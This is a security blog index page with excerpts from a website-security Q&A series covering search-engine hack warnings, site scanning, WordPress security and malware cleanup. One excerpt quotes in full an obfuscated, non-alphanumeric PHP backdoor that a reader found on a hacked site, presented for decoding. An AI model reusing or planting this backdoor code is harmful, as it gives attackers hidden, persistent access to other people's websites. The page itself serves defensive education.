Understanding Search Engine Warnings – Part I – Google – This Site May Be Hacked

If you have any questions about malware, blacklisting, or security in general, send them to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: I just found out that my site is being flagged on Google’s search engine results page with the message “This site may be hacked”. What does it mean?

Answer: This is a good question and one we see often from our clients. We see it so often that we decided to do a series on each type of blacklist warnings that show up on search engines. These are the warnings that we will cover in this series:

Read More

Ask Sucuri: Non-alphanumeric Backdoors

If you have any questions about malware, blacklisting, or security in general, send them to contact@sucuri.net and we will write a post about it and share. For all the “Ask Sucuri” answers, go here.


Question: My site got hacked and I am seeing this backdoor with no alpha numeric characters. What is it doing?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__< <$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Answer: Backdoors are tools used by attackers to help them maintain access to the sites they compromise. The harder it is to find the backdoor, the better for the attackers, since it will likely remain undetected allowing them to reinfect or regain access to the site whenever they want.

This backdoor is a very good example of a sneaky one. No alpha numeric characters, no direct function calls or anything like that. So what is it doing? We asked one of our developers, Yorman Arias, to help decode it.


Read More

Ask Sucuri: How does SiteCheck work?

If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: How does SiteCheck work? I just scanned a site that I think is compromised but the scanner is showing it as clean. Is my site really clean or did you make a mistake?

Answer: SiteCheck is our free, remote website scanner that works to identify if the provided site is infected with any type of malware (including SPAM) or if it’s been blacklisted or defaced.

Read More

WordPress Security – Cutting Through The BS

I recently spoke at WordCamp Chicago 2012 on WordPress Security. In this post I’ll share my presentation but also provide context such that it allows the reader to better digest the presentations content.

Let me know how I do!!!

When putting the presentation together I found myself between a rock and hard spot, I felt as if all the presentations given to date are always about the same stuff. And maybe that’s necessary, repetitiveness is key they say, but is it?

Read More

Automation is Key With Today’s Website Attacks

When trying to undertand the anatomy of attacks on websites you have to break it down into manageable parts. In my mind it really comes down to two types: Targeted and Opportunistic.

More important to understand is how the attack is executed, and that’s what I want to spend some time on in this post.

What do today’s attacks look like?


For most, targeted attacks will be rare, but they do happen every day. You might recall mentions on the news about the CIA website being defaced, or LinkedIn and eHarmony being compromised, in both those instances, I’d categorize those as targeted attacks. There are also examples like the most recent article that talked to the Gizmodo employee who appeared to have lost his entire digital identify, simply because the attacker liked his Twitter handle.

On the flip side, you have opportunistic attacks that are likely what most reading this get affected by. I provide a better discussion on it on our post, Understanding Opportunistic Attacks. The good news though is that in both instances you find many similarities in the attacks, specifically the use of tools that allow for automation.

Read More

ASK Sucuri: What should I do if my email is in the Yahoo Leak?

We love to get questions from you, our readers, in our Ask Sucuri series. If you have any questions about website malware, blacklisting, or security in general, send us an email to: info@sucuri.net or hit us on Twitter – @sucuri_security.


Yesterday we released a blog post about the Yahoo Leak, and created an online tool to check if your email was exposed in the leak. Since then, we have received hundreds of emails asking what should be done for anyone whose account was compromised.

Read More

Ask Sucuri: What should I know when engaging a Web Malware Company?

We work in a business in which it is always chaos. In most situations the client is often distraught, vulnerable, and is plagued with this feeling of being out of control. It is the business of web malware cleanup. The last thing any website owner wants is to delay the cleanup process because of silly things that could have been easily prevented.

In our mind, there are three things you must know before engaging with any web malware company:

  • Know Your Host
  • Know How to Access Your Server
  • Have a Backup

As simple as they may appear, they still remain allusive to many.
Read More

Ask Sucuri: How to Stop The Hacker and ensure Your Site is Locked!!

With the rise in web malware over the last 6 – 12 months, it’s important that we take some time to continue to educate and offer insight into ways that can help you stay ahead, in the hopes of stopping the hacker.

Understanding The Hacker

Before we get started, lets take a look at the name “Hacker.” What many folks don’t realize is that while “Hacker” is often associated with bad, it also has a good association.

To the popular press, “hacker” means someone who breaks into computers. Among programmers it means a good programmer. But the two meanings are connected. To programmers, “hacker” connotes mastery in the most literal sense: someone who can make a computer do what he wants—whether the computer wants to or not. – source: Paul Graham


Read More

A Little Tale About Website Cross-Contamination

Mary has a site that she really cares about, its called mycoolsite.com. She has learned how to monetize her blog through the use of ads, this allows her to make her living. She uses WordPress and always keep it updated. She also keeps her plugins updated, uses strong passwords, accesses the admin panel via SSL and takes all the security recommendations very seriously.

She uses a shared server and her host offers her unlimited domains. Over the years she has taken advantage of this offering, adding a few sites here and there. One such site was mytestsite.com, it’s used to try new themes and plugins.

Read More

Ask Sucuri: Talk More About Web-Based Malware

If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here.

For all the “Ask Aucuri” answers, go here.

Question: My site got hacked and it is distributing malware. Why would anyone do that to me? I don’t know much about viruses on web sites. How do they work?

This is a question we get very often. How can a site have a “virus”? Where does it hide? How does it work? Why would anyone hack my site?

Read More